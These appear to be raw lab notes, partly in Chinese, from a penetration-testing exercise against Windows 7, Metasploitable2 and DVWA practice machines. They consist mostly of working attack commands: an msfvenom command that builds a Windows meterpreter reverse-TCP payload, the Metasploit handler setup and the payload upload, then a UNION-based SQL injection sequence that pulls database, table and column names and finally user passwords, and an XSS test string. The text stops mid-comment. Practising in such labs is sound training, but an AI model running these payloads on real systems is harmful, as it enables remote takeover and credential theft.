kali
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.67.128 lport=5000 -f exe -o /var/payload.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.67.128
set lport 5000
exploit
windows
pwd
mkdir attacker
dir
upload /var/payload.exe C:\\Users\\KiriSoyer\\Desktop\\attack
Metasploitable2-Linux


select firstname,surname from users where id = '{}';
1
1‘
1''
1'#
1'--+



1' order by 1#
1' order by 2#
1' order by 3#
1' union select 1#
1' union select 1,2#
1' union select 1,2,3#
// 获取信息
1' union select database(),user()#
-1' union select database(),user()#
-1' union select version(),@@version_compile_os#
-1' union select table_name,2 from information_schema.tables where table_schema='dvwa'#
-1' union select column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
-1' union select user,password from users#







Win7-1(安装好WampServer)
Win7-2
Metasploitable2-Linux

输入 单击submit
<script>alert('xss')</script>

// 使用 str_replace 函数将输入中的”